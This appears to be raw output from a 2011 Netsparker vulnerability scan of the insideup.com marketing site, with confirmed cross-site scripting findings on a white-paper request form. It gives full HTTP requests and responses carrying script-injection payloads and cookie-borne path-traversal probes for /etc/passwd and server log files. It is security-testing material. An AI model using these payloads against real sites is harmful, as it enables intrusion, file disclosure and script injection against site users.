value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> </a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="'"--></style></script><script>netsparker(0x001151)</script>"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"&g..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST '"--></style></script><script>alert(0x001172)</script>
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
parentPage POST 3
phone POST 3
src POST teledirectcasestudy
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 233
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001172)%3c%2fscript%3e&email=netsparker%40example.com&firstName=Smith&lastName=Smith&parentPage=3&phone=3&src=teledirectcasestudy&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:10 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=07881089287ED8B1DB37E22ABC62E646; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> </a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"> <input name="companyServices" type="text" value="..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST '"--></style></script><script>alert(0x001181)</script>
firstName POST Smith
lastName POST Smith
parentPage POST 3
phone POST 3
src POST teledirectcasestudy
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 